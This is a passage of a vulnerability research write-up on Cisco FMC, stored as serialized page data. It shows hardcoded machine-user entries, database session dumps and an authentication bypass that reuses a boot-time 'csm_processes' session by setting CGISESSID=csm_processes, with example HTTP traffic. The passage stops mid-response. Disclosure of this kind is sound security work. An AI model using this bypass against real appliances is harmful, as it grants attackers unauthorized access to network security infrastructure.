"class":1391},[1373,5162,183],{"class":1387},[1373,5164,1246],{"class":4640},[1373,5166,183],{"class":1387},[1373,5168,5110],{"class":1391},[1373,5170,183],{"class":1387},[1373,5172,4680],{"class":4640},[1373,5174,5175,5177,5179,5182,5184,5186,5188,5191,5193,5195,5197,5199,5201,5203,5205,5207,5209],{"class":1375,"line":4724},[1373,5176,5056],{"class":4640},[1373,5178,183],{"class":1387},[1373,5180,5181],{"class":1391},"SRU",[1373,5183,183],{"class":1387},[1373,5185,1246],{"class":4640},[1373,5187,183],{"class":1387},[1373,5189,5190],{"class":1391},"SRUuser",[1373,5192,183],{"class":1387},[1373,5194,1246],{"class":4640},[1373,5196,183],{"class":1387},[1373,5198,5079],{"class":1391},[1373,5200,183],{"class":1387},[1373,5202,1246],{"class":4640},[1373,5204,183],{"class":1387},[1373,5206,5079],{"class":1391},[1373,5208,183],{"class":1387},[1373,5210,5092],{"class":4640},[1373,5212,5213,5215,5217,5219,5221,5223,5225,5227,5229],{"class":1375,"line":4756},[1373,5214,5097],{"class":4640},[1373,5216,183],{"class":1387},[1373,5218,5181],{"class":1391},[1373,5220,183],{"class":1387},[1373,5222,1246],{"class":4640},[1373,5224,183],{"class":1387},[1373,5226,5110],{"class":1391},[1373,5228,183],{"class":1387},[1373,5230,4680],{"class":4640},[1373,5232,5233,5235,5237,5240,5242,5244,5246,5249,5251,5253,5255,5257,5259,5261,5263,5265,5267],{"class":1375,"line":4768},[1373,5234,5056],{"class":4640},[1373,5236,183],{"class":1387},[1373,5238,5239],{"class":1391},"Sourcefire",[1373,5241,183],{"class":1387},[1373,5243,1246],{"class":4640},[1373,5245,183],{"class":1387},[1373,5247,5248],{"class":1391},"SourcefireUser",[1373,5250,183],{"class":1387},[1373,5252,1246],{"class":4640},[1373,5254,183],{"class":1387},[1373,5256,5079],{"class":1391},[1373,5258,183],{"class":1387},[1373,5260,1246],{"class":4640},[1373,5262,183],{"class":1387},[1373,5264,5079],{"class":1391},[1373,5266,183],{"class":1387},[1373,5268,5092],{"class":4640},[1373,5270,5271,5273,5275,5277,5279,5281,5283,5285,5287],{"clas
s":1375,"line":4792},[1373,5272,5097],{"class":4640},[1373,5274,183],{"class":1387},[1373,5276,5239],{"class":1391},[1373,5278,183],{"class":1387},[1373,5280,1246],{"class":4640},[1373,5282,183],{"class":1387},[1373,5284,5110],{"class":1391},[1373,5286,183],{"class":1387},[1373,5288,4680],{"class":4640},[1373,5290,5291,5293,5295,5297,5299,5301,5303,5305,5307,5309,5311,5313,5315,5317,5319,5321,5323],{"class":1375,"line":4798},[1373,5292,5056],{"class":4640},[1373,5294,183],{"class":1387},[1373,5296,4442],{"class":1391},[1373,5298,183],{"class":1387},[1373,5300,1246],{"class":4640},[1373,5302,183],{"class":1387},[1373,5304,4442],{"class":1391},[1373,5306,183],{"class":1387},[1373,5308,1246],{"class":4640},[1373,5310,183],{"class":1387},[1373,5312,5079],{"class":1391},[1373,5314,183],{"class":1387},[1373,5316,1246],{"class":4640},[1373,5318,183],{"class":1387},[1373,5320,5079],{"class":1391},[1373,5322,183],{"class":1387},[1373,5324,5092],{"class":4640},[1373,5326,5327,5329,5331,5333,5335,5337,5339,5342,5344],{"class":1375,"line":4806},[1373,5328,5097],{"class":4640},[1373,5330,183],{"class":1387},[1373,5332,4442],{"class":1391},[1373,5334,183],{"class":1387},[1373,5336,1246],{"class":4640},[1373,5338,183],{"class":1387},[1373,5340,5341],{"class":1391},"csmdaemon",[1373,5343,183],{"class":1387},[1373,5345,4680],{"class":4640},[18,5347,5348,5349,5352],{},"These hardcoded credentials corresponded to the hashes stored in the FMC system’s MySQL server in the ",[886,5350,5351],{},"sfsnort.users"," database table, meaning that they are at least partially hardcoded. Immediately, our first instinct was to try authenticating with every authentication entry point we could find with these credentials, but no dice: Machine users are unable to authenticate to the web interface and are not allowed to interact with the routed API services. 
By inspecting theApache logs and packet captures, we could see that these processes were run locally, and each of these users would occasionally interact with portions of the API from the local machine perspective.",[18,5354,5355,5356,59],{},"This gave us a few hints about where these machine user accounts were created and some of their common uses. The next step was to figure out what \"This vulnerability is due to an improper system process that is created at boot time\" meant in Cisco’s ",[47,5357,5359],{"href":4546,"rel":5358},[51],"advisory",[18,5361,5362,5363,5366,5367,5369],{},"During boot time, a few of the above accounts run scripts of the startup process for FMC. Only the Go binary ",[886,5364,5365],{},"\u002FVolume\u002F7.7.11-1061\u002Fsf\u002Fbin\u002Fauth-daemon"," handles a large number of initial startup actions. One of the primary actions is to create a session for the ",[886,5368,4442],{}," user to kick-off its first-start logic, which ends in the following database entry containing the Perl serialized session information:",[1354,5371,5375],{"className":5372,"code":5373,"language":5374,"meta":219,"style":219},"language-sql shiki shiki-themes material-theme-lighter github-light github-dark monokai","MariaDB [(none)]> SELECT a_session FROM sfsnort.sessions;\n| a_session\n| $D = {'username' => 'csm_processes','original_domain' => 'e276abec-e0f2-11e3-8169-6d9ed49b625f','session_expire_check' => 1,'useruuid' => '8acb8f4a-c40d-11e3-95aa-54f999c07ac9','usertype' => 2,'_SESSION_CTIME' => 1773962523,'_SESSION_ATIME' => 1773962523,'_SESSION_ID' => 'csm_processes','active' => 0,'_SESSION_REMOTE_ADDR' => '','_SESSION_EXPIRE_LIST' => {},'VMS_SESSION_ID' => 'csm_processes','current_domain' => 'e276abec-e0f2-11e3-8169-6d9ed49b625f'};;$D |\n","sql",[886,5376,5377,5405,5410],{"__ignoreMap":219},[1373,5378,5379,5382,5385,5389,5392,5395,5398,5400,5403],{"class":1375,"line":1376},[1373,5380,5381],{"class":4640},"MariaDB 
[(none)]",[1373,5383,5384],{"class":1397},">",[1373,5386,5388],{"class":5387},"shWJe"," SELECT",[1373,5390,5391],{"class":4640}," a_session ",[1373,5393,5394],{"class":5387},"FROM",[1373,5396,5397],{"class":2326}," sfsnort",[1373,5399,59],{"class":4640},[1373,5401,5402],{"class":2326},"sessions",[1373,5404,4912],{"class":4640},[1373,5406,5407],{"class":1375,"line":220},[1373,5408,5409],{"class":4640},"| a_session\n",[1373,5411,5412,5415,5418,5421,5423,5425,5427,5429,5431,5433,5435,5438,5440,5443,5445,5447,5449,5452,5454,5456,5458,5461,5463,5465,5469,5471,5473,5476,5478,5480,5482,5485,5487,5489,5491,5493,5495,5497,5500,5502,5504,5507,5509,5511,5514,5516,5518,5521,5523,5525,5527,5529,5531,5534,5536,5538,5540,5542,5544,5546,5548,5551,5553,5555,5558,5560,5562,5565,5567,5569,5572,5574,5576,5579,5581,5583,5586,5588,5591,5593,5595,5597,5599,5601,5603,5605,5608,5610,5612,5614,5616,5618],{"class":1375,"line":1266},[1373,5413,5414],{"class":4640},"| $D ",[1373,5416,5417],{"class":1397},"=",[1373,5419,5420],{"class":4640}," {",[1373,5422,1388],{"class":1387},[1373,5424,4870],{"class":1391},[1373,5426,1388],{"class":1387},[1373,5428,4986],{"class":1397},[1373,5430,4713],{"class":1387},[1373,5432,4442],{"class":1391},[1373,5434,1388],{"class":1387},[1373,5436,5437],{"class":4640},",",[1373,5439,1388],{"class":1387},[1373,5441,5442],{"class":1391},"original_domain",[1373,5444,1388],{"class":1387},[1373,5446,4986],{"class":1397},[1373,5448,4713],{"class":1387},[1373,5450,5451],{"class":1391},"e276abec-e0f2-11e3-8169-6d9ed49b625f",[1373,5453,1388],{"class":1387},[1373,5455,5437],{"class":4640},[1373,5457,1388],{"class":1387},[1373,5459,5460],{"class":1391},"session_expire_check",[1373,5462,1388],{"class":1387},[1373,5464,4986],{"class":1397},[1373,5466,5468],{"class":5467},"sYThS"," 
1",[1373,5470,5437],{"class":4640},[1373,5472,1388],{"class":1387},[1373,5474,5475],{"class":1391},"useruuid",[1373,5477,1388],{"class":1387},[1373,5479,4986],{"class":1397},[1373,5481,4713],{"class":1387},[1373,5483,5484],{"class":1391},"8acb8f4a-c40d-11e3-95aa-54f999c07ac9",[1373,5486,1388],{"class":1387},[1373,5488,5437],{"class":4640},[1373,5490,1388],{"class":1387},[1373,5492,4675],{"class":1391},[1373,5494,1388],{"class":1387},[1373,5496,4986],{"class":1397},[1373,5498,5499],{"class":5467}," 2",[1373,5501,5437],{"class":4640},[1373,5503,1388],{"class":1387},[1373,5505,5506],{"class":1391},"_SESSION_CTIME",[1373,5508,1388],{"class":1387},[1373,5510,4986],{"class":1397},[1373,5512,5513],{"class":5467}," 1773962523",[1373,5515,5437],{"class":4640},[1373,5517,1388],{"class":1387},[1373,5519,5520],{"class":1391},"_SESSION_ATIME",[1373,5522,1388],{"class":1387},[1373,5524,4986],{"class":1397},[1373,5526,5513],{"class":5467},[1373,5528,5437],{"class":4640},[1373,5530,1388],{"class":1387},[1373,5532,5533],{"class":1391},"_SESSION_ID",[1373,5535,1388],{"class":1387},[1373,5537,4986],{"class":1397},[1373,5539,4713],{"class":1387},[1373,5541,4442],{"class":1391},[1373,5543,1388],{"class":1387},[1373,5545,5437],{"class":4640},[1373,5547,1388],{"class":1387},[1373,5549,5550],{"class":1391},"active",[1373,5552,1388],{"class":1387},[1373,5554,4986],{"class":1397},[1373,5556,5557],{"class":5467}," 0",[1373,5559,5437],{"class":4640},[1373,5561,1388],{"class":1387},[1373,5563,5564],{"class":1391},"_SESSION_REMOTE_ADDR",[1373,5566,1388],{"class":1387},[1373,5568,4986],{"class":1397},[1373,5570,5571],{"class":1387}," ''",[1373,5573,5437],{"class":4640},[1373,5575,1388],{"class":1387},[1373,5577,5578],{"class":1391},"_SESSION_EXPIRE_LIST",[1373,5580,1388],{"class":1387},[1373,5582,4986],{"class":1397},[1373,5584,5585],{"class":4640}," 
{},",[1373,5587,1388],{"class":1387},[1373,5589,5590],{"class":1391},"VMS_SESSION_ID",[1373,5592,1388],{"class":1387},[1373,5594,4986],{"class":1397},[1373,5596,4713],{"class":1387},[1373,5598,4442],{"class":1391},[1373,5600,1388],{"class":1387},[1373,5602,5437],{"class":4640},[1373,5604,1388],{"class":1387},[1373,5606,5607],{"class":1391},"current_domain",[1373,5609,1388],{"class":1387},[1373,5611,4986],{"class":1397},[1373,5613,4713],{"class":1387},[1373,5615,5451],{"class":1391},[1373,5617,1388],{"class":1387},[1373,5619,5620],{"class":4640},"};;$D |\n",[18,5622,5623,5624,5626,5627,5630],{},"Notably, the ",[886,5625,4446],{}," database and table are the same locations where valid web UI authentications happen. No other machine accounts appear to have sessions created in this portion of the database, and the only other ",[886,5628,5629],{},"a_session"," objects that get created are from user web authentication. A few things about the above:",[1789,5632,5633,5641],{},[25,5634,5635,5637,5638,5640],{},[886,5636,5550],{}," set to ",[886,5639,445],{}," means that the session is active",[25,5642,5643,5637,5645,5647,5648,5651],{},[886,5644,5460],{},[886,5646,467],{}," means that the session expiration ",[1131,5649,5650],{},"is"," checked",[18,5653,5654],{},"Additionally, when a user logs into the web UI, normally the session looks like the following:",[1354,5656,5658],{"className":5372,"code":5657,"language":5374,"meta":219,"style":219},"MariaDB [(none)]> SELECT a_session FROM sfsnort.sessions;\n| a_session |\n| $D = {'active' => 0,'last_csm_refresh' => 1774465805,'sf_action_id' => 'a490cd6e67ccde81d131684846d7a13c','original_domain' => 'e276abec-e0f2-11e3-8169-6d9ed49b625f','_SESSION_CTIME' => 1774465805,'_SESSION_EXPIRE_LIST' => {'session_expire_check' => 3600},'username' => 'admin','session_expire_check' => 1,'user_access_type' => 'rw','last_login' => {'last_login_time' => 1773962153,'remote_host_ip' => '10.0.1.10'},'useruuid' => 
'68d03c42-d9bd-11dc-89f2-b7961d42c462','_SESSION_REMOTE_ADDR' => '10.0.1.10','current_domain' => 'e276abec-e0f2-11e3-8169-6d9ed49b625f','domains' => '[{\"name\":\"Global\",\"uuid\":\"e276abec-e0f2-11e3-8169-6d9ed49b625f\"}]','_SESSION_ATIME' => 1774465819,'IS_WORKFLOW_MODE' => 'false','VMS_SESSION_ID' => '-1102361566','usertype' => 1,'_SESSION_ID' => '80a3ec54ed31807a655fb7d2018c69cf','_SESSION_ETIME' => 3900};;$D |\n| $D = {'_SESSION_ATIME' => 1774465771,'original_domain' => 'e276abec-e0f2-11e3-8169-6d9ed49b625f','useruuid' => '8acb8f4a-c40d-11e3-95aa-54f999c07ac9','current_domain' => 'e276abec-e0f2-11e3-8169-6d9ed49b625f','_SESSION_EXPIRE_LIST' => {},'usertype' => 2,'_SESSION_CTIME' => 1774465771,'active' => 0,'_SESSION_ID' => 'csm_processes','VMS_SESSION_ID' => 'csm_processes','session_expire_check' => 1,'_SESSION_REMOTE_ADDR' => '','username' => 'csm_processes'};;$D |\n",[886,5659,5660,5680,5685,6036],{"__ignoreMap":219},[1373,5661,5662,5664,5666,5668,5670,5672,5674,5676,5678],{"class":1375,"line":1376},[1373,5663,5381],{"class":4640},[1373,5665,5384],{"class":1397},[1373,5667,5388],{"class":5387},[1373,5669,5391],{"class":4640},[1373,5671,5394],{"class":5387},[1373,5673,5397],{"class":2326},[1373,5675,59],{"class":4640},[1373,5677,5402],{"class":2326},[1373,5679,4912],{"class":4640},[1373,5681,5682],{"class":1375,"line":220},[1373,5683,5684],{"class":4640},"| a_session 
|\n",[1373,5686,5687,5689,5691,5693,5695,5697,5699,5701,5703,5705,5707,5710,5712,5714,5717,5719,5721,5723,5725,5727,5729,5732,5734,5736,5738,5740,5742,5744,5746,5748,5750,5752,5754,5756,5758,5760,5762,5764,5766,5768,5770,5772,5774,5776,5778,5780,5782,5785,5788,5790,5792,5794,5796,5798,5801,5803,5805,5807,5809,5811,5813,5815,5817,5819,5822,5824,5826,5828,5831,5833,5835,5837,5840,5842,5844,5846,5848,5851,5853,5855,5858,5860,5862,5865,5867,5869,5871,5874,5876,5878,5880,5882,5884,5886,5888,5891,5893,5895,5897,5899,5901,5903,5905,5907,5909,5911,5913,5915,5917,5919,5921,5923,5925,5927,5929,5932,5934,5936,5938,5941,5943,5945,5947,5949,5951,5953,5956,5958,5960,5963,5965,5967,5969,5972,5974,5976,5978,5980,5982,5984,5986,5989,5991,5993,5995,5997,5999,6001,6003,6005,6007,6009,6011,6013,6015,6018,6020,6022,6024,6027,6029,6031,6034],{"class":1375,"line":1266},[1373,5688,5414],{"class":4640},[1373,5690,5417],{"class":1397},[1373,5692,5420],{"class":4640},[1373,5694,1388],{"class":1387},[1373,5696,5550],{"class":1391},[1373,5698,1388],{"class":1387},[1373,5700,4986],{"class":1397},[1373,5702,5557],{"class":5467},[1373,5704,5437],{"class":4640},[1373,5706,1388],{"class":1387},[1373,5708,5709],{"class":1391},"last_csm_refresh",[1373,5711,1388],{"class":1387},[1373,5713,4986],{"class":1397},[1373,5715,5716],{"class":5467}," 
1774465805",[1373,5718,5437],{"class":4640},[1373,5720,1388],{"class":1387},[1373,5722,4468],{"class":1391},[1373,5724,1388],{"class":1387},[1373,5726,4986],{"class":1397},[1373,5728,4713],{"class":1387},[1373,5730,5731],{"class":1391},"a490cd6e67ccde81d131684846d7a13c",[1373,5733,1388],{"class":1387},[1373,5735,5437],{"class":4640},[1373,5737,1388],{"class":1387},[1373,5739,5442],{"class":1391},[1373,5741,1388],{"class":1387},[1373,5743,4986],{"class":1397},[1373,5745,4713],{"class":1387},[1373,5747,5451],{"class":1391},[1373,5749,1388],{"class":1387},[1373,5751,5437],{"class":4640},[1373,5753,1388],{"class":1387},[1373,5755,5506],{"class":1391},[1373,5757,1388],{"class":1387},[1373,5759,4986],{"class":1397},[1373,5761,5716],{"class":5467},[1373,5763,5437],{"class":4640},[1373,5765,1388],{"class":1387},[1373,5767,5578],{"class":1391},[1373,5769,1388],{"class":1387},[1373,5771,4986],{"class":1397},[1373,5773,5420],{"class":4640},[1373,5775,1388],{"class":1387},[1373,5777,5460],{"class":1391},[1373,5779,1388],{"class":1387},[1373,5781,4986],{"class":1397},[1373,5783,5784],{"class":5467}," 
3600",[1373,5786,5787],{"class":4640},"},",[1373,5789,1388],{"class":1387},[1373,5791,4870],{"class":1391},[1373,5793,1388],{"class":1387},[1373,5795,4986],{"class":1397},[1373,5797,4713],{"class":1387},[1373,5799,5800],{"class":1391},"admin",[1373,5802,1388],{"class":1387},[1373,5804,5437],{"class":4640},[1373,5806,1388],{"class":1387},[1373,5808,5460],{"class":1391},[1373,5810,1388],{"class":1387},[1373,5812,4986],{"class":1397},[1373,5814,5468],{"class":5467},[1373,5816,5437],{"class":4640},[1373,5818,1388],{"class":1387},[1373,5820,5821],{"class":1391},"user_access_type",[1373,5823,1388],{"class":1387},[1373,5825,4986],{"class":1397},[1373,5827,4713],{"class":1387},[1373,5829,5830],{"class":1391},"rw",[1373,5832,1388],{"class":1387},[1373,5834,5437],{"class":4640},[1373,5836,1388],{"class":1387},[1373,5838,5839],{"class":1391},"last_login",[1373,5841,1388],{"class":1387},[1373,5843,4986],{"class":1397},[1373,5845,5420],{"class":4640},[1373,5847,1388],{"class":1387},[1373,5849,5850],{"class":1391},"last_login_time",[1373,5852,1388],{"class":1387},[1373,5854,4986],{"class":1397},[1373,5856,5857],{"class":5467}," 
1773962153",[1373,5859,5437],{"class":4640},[1373,5861,1388],{"class":1387},[1373,5863,5864],{"class":1391},"remote_host_ip",[1373,5866,1388],{"class":1387},[1373,5868,4986],{"class":1397},[1373,5870,4713],{"class":1387},[1373,5872,5873],{"class":1391},"10.0.1.10",[1373,5875,1388],{"class":1387},[1373,5877,5787],{"class":4640},[1373,5879,1388],{"class":1387},[1373,5881,5475],{"class":1391},[1373,5883,1388],{"class":1387},[1373,5885,4986],{"class":1397},[1373,5887,4713],{"class":1387},[1373,5889,5890],{"class":1391},"68d03c42-d9bd-11dc-89f2-b7961d42c462",[1373,5892,1388],{"class":1387},[1373,5894,5437],{"class":4640},[1373,5896,1388],{"class":1387},[1373,5898,5564],{"class":1391},[1373,5900,1388],{"class":1387},[1373,5902,4986],{"class":1397},[1373,5904,4713],{"class":1387},[1373,5906,5873],{"class":1391},[1373,5908,1388],{"class":1387},[1373,5910,5437],{"class":4640},[1373,5912,1388],{"class":1387},[1373,5914,5607],{"class":1391},[1373,5916,1388],{"class":1387},[1373,5918,4986],{"class":1397},[1373,5920,4713],{"class":1387},[1373,5922,5451],{"class":1391},[1373,5924,1388],{"class":1387},[1373,5926,5437],{"class":4640},[1373,5928,1388],{"class":1387},[1373,5930,5931],{"class":1391},"domains",[1373,5933,1388],{"class":1387},[1373,5935,4986],{"class":1397},[1373,5937,4713],{"class":1387},[1373,5939,5940],{"class":1391},"[{\"name\":\"Global\",\"uuid\":\"e276abec-e0f2-11e3-8169-6d9ed49b625f\"}]",[1373,5942,1388],{"class":1387},[1373,5944,5437],{"class":4640},[1373,5946,1388],{"class":1387},[1373,5948,5520],{"class":1391},[1373,5950,1388],{"class":1387},[1373,5952,4986],{"class":1397},[1373,5954,5955],{"class":5467}," 
1774465819",[1373,5957,5437],{"class":4640},[1373,5959,1388],{"class":1387},[1373,5961,5962],{"class":1391},"IS_WORKFLOW_MODE",[1373,5964,1388],{"class":1387},[1373,5966,4986],{"class":1397},[1373,5968,4713],{"class":1387},[1373,5970,5971],{"class":1391},"false",[1373,5973,1388],{"class":1387},[1373,5975,5437],{"class":4640},[1373,5977,1388],{"class":1387},[1373,5979,5590],{"class":1391},[1373,5981,1388],{"class":1387},[1373,5983,4986],{"class":1397},[1373,5985,4713],{"class":1387},[1373,5987,5988],{"class":1391},"-1102361566",[1373,5990,1388],{"class":1387},[1373,5992,5437],{"class":4640},[1373,5994,1388],{"class":1387},[1373,5996,4675],{"class":1391},[1373,5998,1388],{"class":1387},[1373,6000,4986],{"class":1397},[1373,6002,5468],{"class":5467},[1373,6004,5437],{"class":4640},[1373,6006,1388],{"class":1387},[1373,6008,5533],{"class":1391},[1373,6010,1388],{"class":1387},[1373,6012,4986],{"class":1397},[1373,6014,4713],{"class":1387},[1373,6016,6017],{"class":1391},"80a3ec54ed31807a655fb7d2018c69cf",[1373,6019,1388],{"class":1387},[1373,6021,5437],{"class":4640},[1373,6023,1388],{"class":1387},[1373,6025,6026],{"class":1391},"_SESSION_ETIME",[1373,6028,1388],{"class":1387},[1373,6030,4986],{"class":1397},[1373,6032,6033],{"class":5467}," 
3900",[1373,6035,5620],{"class":4640},[1373,6037,6038,6040,6042,6044,6046,6048,6050,6052,6055,6057,6059,6061,6063,6065,6067,6069,6071,6073,6075,6077,6079,6081,6083,6085,6087,6089,6091,6093,6095,6097,6099,6101,6103,6105,6107,6109,6111,6113,6115,6117,6119,6121,6123,6125,6127,6129,6131,6133,6135,6137,6139,6141,6143,6145,6147,6149,6151,6153,6155,6157,6159,6161,6163,6165,6167,6169,6171,6173,6175,6177,6179,6181,6183,6185,6187,6189,6191,6193,6195,6197,6199,6201,6203,6205,6207,6209,6211,6213,6215,6217,6219,6221],{"class":1375,"line":1852},[1373,6039,5414],{"class":4640},[1373,6041,5417],{"class":1397},[1373,6043,5420],{"class":4640},[1373,6045,1388],{"class":1387},[1373,6047,5520],{"class":1391},[1373,6049,1388],{"class":1387},[1373,6051,4986],{"class":1397},[1373,6053,6054],{"class":5467}," 1774465771",[1373,6056,5437],{"class":4640},[1373,6058,1388],{"class":1387},[1373,6060,5442],{"class":1391},[1373,6062,1388],{"class":1387},[1373,6064,4986],{"class":1397},[1373,6066,4713],{"class":1387},[1373,6068,5451],{"class":1391},[1373,6070,1388],{"class":1387},[1373,6072,5437],{"class":4640},[1373,6074,1388],{"class":1387},[1373,6076,5475],{"class":1391},[1373,6078,1388],{"class":1387},[1373,6080,4986],{"class":1397},[1373,6082,4713],{"class":1387},[1373,6084,5484],{"class":1391},[1373,6086,1388],{"class":1387},[1373,6088,5437],{"class":4640},[1373,6090,1388],{"class":1387},[1373,6092,5607],{"class":1391},[1373,6094,1388],{"class":1387},[1373,6096,4986],{"class":1397},[1373,6098,4713],{"class":1387},[1373,6100,5451],{"class":1391},[1373,6102,1388],{"class":1387},[1373,6104,5437],{"class":4640},[1373,6106,1388],{"class":1387},[1373,6108,5578],{"class":1391},[1373,6110,1388],{"class":1387},[1373,6112,4986],{"class":1397},[1373,6114,5585],{"class":4640},[1373,6116,1388],{"class":1387},[1373,6118,4675],{"class":1391},[1373,6120,1388],{"class":1387},[1373,6122,4986],{"class":1397},[1373,6124,5499],{"class":5467},[1373,6126,5437],{"class":4640},[1373,6128,1388],{"class":1387},[1373,613
0,5506],{"class":1391},[1373,6132,1388],{"class":1387},[1373,6134,4986],{"class":1397},[1373,6136,6054],{"class":5467},[1373,6138,5437],{"class":4640},[1373,6140,1388],{"class":1387},[1373,6142,5550],{"class":1391},[1373,6144,1388],{"class":1387},[1373,6146,4986],{"class":1397},[1373,6148,5557],{"class":5467},[1373,6150,5437],{"class":4640},[1373,6152,1388],{"class":1387},[1373,6154,5533],{"class":1391},[1373,6156,1388],{"class":1387},[1373,6158,4986],{"class":1397},[1373,6160,4713],{"class":1387},[1373,6162,4442],{"class":1391},[1373,6164,1388],{"class":1387},[1373,6166,5437],{"class":4640},[1373,6168,1388],{"class":1387},[1373,6170,5590],{"class":1391},[1373,6172,1388],{"class":1387},[1373,6174,4986],{"class":1397},[1373,6176,4713],{"class":1387},[1373,6178,4442],{"class":1391},[1373,6180,1388],{"class":1387},[1373,6182,5437],{"class":4640},[1373,6184,1388],{"class":1387},[1373,6186,5460],{"class":1391},[1373,6188,1388],{"class":1387},[1373,6190,4986],{"class":1397},[1373,6192,5468],{"class":5467},[1373,6194,5437],{"class":4640},[1373,6196,1388],{"class":1387},[1373,6198,5564],{"class":1391},[1373,6200,1388],{"class":1387},[1373,6202,4986],{"class":1397},[1373,6204,5571],{"class":1387},[1373,6206,5437],{"class":4640},[1373,6208,1388],{"class":1387},[1373,6210,4870],{"class":1391},[1373,6212,1388],{"class":1387},[1373,6214,4986],{"class":1397},[1373,6216,4713],{"class":1387},[1373,6218,4442],{"class":1391},[1373,6220,1388],{"class":1387},[1373,6222,5620],{"class":4640},[18,6224,6225],{},"This shows that a few more things are missing or different between the machine user authentication and the admin user authentication:",[22,6227,6228,6240],{},[25,6229,6230,1246,6232,1246,6234,6236,6237,6239],{},[886,6231,5821],{},[886,6233,4468],{},[886,6235,5931],{},", and more are not present in the ",[886,6238,4442],{}," session object.",[25,6241,6242,6243,6245,6246],{},"Some of the values appear to differ in content type, notably ",[886,6244,5533],{}," parameters and 
",[886,6247,5533],{},[18,6249,6250,6251,6253,6254,6257,6258,6261,6262,6265],{},"The most interesting part for now is that the ",[886,6252,5533],{}," value corresponds to the web UI admin user’s ",[886,6255,6256],{},"CGISESSID=80a3ec54ed31807a655fb7d2018c69cf"," cookie value and is generated dynamically for normal user authentication. Immediately, we attempt to set ",[886,6259,6260],{},"CGISESSID"," to be ",[886,6263,6264],{},"CGISESSID=csm_processes"," in order to correspond to the startup process value.",[18,6267,6268,6269,6272],{},"Sure enough, a request to the ",[886,6270,6271],{},"\u002Fhelp\u002Fabout.cgi"," CGI endpoint without a cookie set returns an invalid session error:",[1354,6274,6278],{"className":6275,"code":6276,"language":6277,"meta":219,"style":219},"language-http shiki shiki-themes material-theme-lighter github-light github-dark monokai","GET \u002Fhelp\u002Fabout.cgi HTTP\u002F1.1\nHost: 10.0.0.226\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\nAccept-Encoding: gzip, deflate, br\nConnection: keep-alive\n\n\n","http",[886,6279,6280,6296,6307,6317,6327],{"__ignoreMap":219},[1373,6281,6282,6285,6288,6291,6293],{"class":1375,"line":1376},[1373,6283,6284],{"class":4636},"GET",[1373,6286,6287],{"class":4640}," \u002Fhelp\u002Fabout.cgi ",[1373,6289,6290],{"class":5387},"HTTP",[1373,6292,2180],{"class":4640},[1373,6294,6295],{"class":5467},"1.1\n",[1373,6297,6298,6302,6304],{"class":1375,"line":220},[1373,6299,6301],{"class":6300},"sHsBP","Host",[1373,6303,4606],{"class":5387},[1373,6305,6306],{"class":1391}," 10.0.0.226\n",[1373,6308,6309,6312,6314],{"class":1375,"line":1266},[1373,6310,6311],{"class":6300},"User-Agent",[1373,6313,4606],{"class":5387},[1373,6315,6316],{"class":1391}," Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 
Safari\u002F537.36\n",[1373,6318,6319,6322,6324],{"class":1375,"line":1852},[1373,6320,6321],{"class":6300},"Accept-Encoding",[1373,6323,4606],{"class":5387},[1373,6325,6326],{"class":1391}," gzip, deflate, br\n",[1373,6328,6329,6332,6334],{"class":1375,"line":4692},[1373,6330,6331],{"class":6300},"Connection",[1373,6333,4606],{"class":5387},[1373,6335,6336],{"class":1391}," keep-alive\n",[1354,6338,6340],{"className":6275,"code":6339,"language":6277,"meta":219,"style":219},"HTTP\u002F1.1 302 Found\nDate: Wed, 25 Mar 2026 19:30:07 GMT\nServer: Mojolicious (Perl)\nStrict-Transport-Security: max-age=31536000; includeSubDomains\nContent-Type: text\u002Fplain; charset=utf-8\nLocation: \u002Fui\u002Flogin?target=%2Fmojo-async%2Fhelp%2Fabout.cgi\nContent-Length: 19\nCache-Control: no-store\nX-Frame-Options: SAMEORIGIN\nX-UA-Compatible: IE=edge\nX-Permitted-Cross-Domain-Policies: none\nX-XSS-Protection: 1; mode=block\nReferrer-Policy: same-origin\nContent-Security-Policy: base-uri 'self'; frame-ancestors 'self'\nX-Content-Type-Options: nosniff\nKeep-Alive: timeout=5, max=100\nConnection: Keep-Alive\n\nInvalid session ID \n",[886,6341,6342,6357,6367,6377,6387,6397,6407,6417,6427,6437,6447,6457,6467,6477,6487,6497,6507,6516,6521],{"__ignoreMap":219},[1373,6343,6344,6346,6348,6351,6354],{"class":1375,"line":1376},[1373,6345,6290],{"class":5387},[1373,6347,2180],{"class":4640},[1373,6349,6350],{"class":5467},"1.1",[1373,6352,6353],{"class":5467}," 302",[1373,6355,6356],{"class":1391}," Found\n",[1373,6358,6359,6362,6364],{"class":1375,"line":220},[1373,6360,6361],{"class":6300},"Date",[1373,6363,4606],{"class":5387},[1373,6365,6366],{"class":1391}," Wed, 25 Mar 2026 19:30:07 GMT\n",[1373,6368,6369,6372,6374],{"class":1375,"line":1266},[1373,6370,6371],{"class":6300},"Server",[1373,6373,4606],{"class":5387},[1373,6375,6376],{"class":1391}," Mojolicious 
(Perl)\n",[1373,6378,6379,6382,6384],{"class":1375,"line":1852},[1373,6380,6381],{"class":6300},"Strict-Transport-Security",[1373,6383,4606],{"class":5387},[1373,6385,6386],{"class":1391}," max-age=31536000; includeSubDomains\n",[1373,6388,6389,6392,6394],{"class":1375,"line":4692},[1373,6390,6391],{"class":6300},"Content-Type",[1373,6393,4606],{"class":5387},[1373,6395,6396],{"class":1391}," text\u002Fplain; charset=utf-8\n",[1373,6398,6399,6402,6404],{"class":1375,"line":4724},[1373,6400,6401],{"class":6300},"Location",[1373,6403,4606],{"class":5387},[1373,6405,6406],{"class":1391}," \u002Fui\u002Flogin?target=%2Fmojo-async%2Fhelp%2Fabout.cgi\n",[1373,6408,6409,6412,6414],{"class":1375,"line":4756},[1373,6410,6411],{"class":6300},"Content-Length",[1373,6413,4606],{"class":5387},[1373,6415,6416],{"class":1391}," 19\n",[1373,6418,6419,6422,6424],{"class":1375,"line":4768},[1373,6420,6421],{"class":6300},"Cache-Control",[1373,6423,4606],{"class":5387},[1373,6425,6426],{"class":1391}," no-store\n",[1373,6428,6429,6432,6434],{"class":1375,"line":4792},[1373,6430,6431],{"class":6300},"X-Frame-Options",[1373,6433,4606],{"class":5387},[1373,6435,6436],{"class":1391}," SAMEORIGIN\n",[1373,6438,6439,6442,6444],{"class":1375,"line":4798},[1373,6440,6441],{"class":6300},"X-UA-Compatible",[1373,6443,4606],{"class":5387},[1373,6445,6446],{"class":1391}," 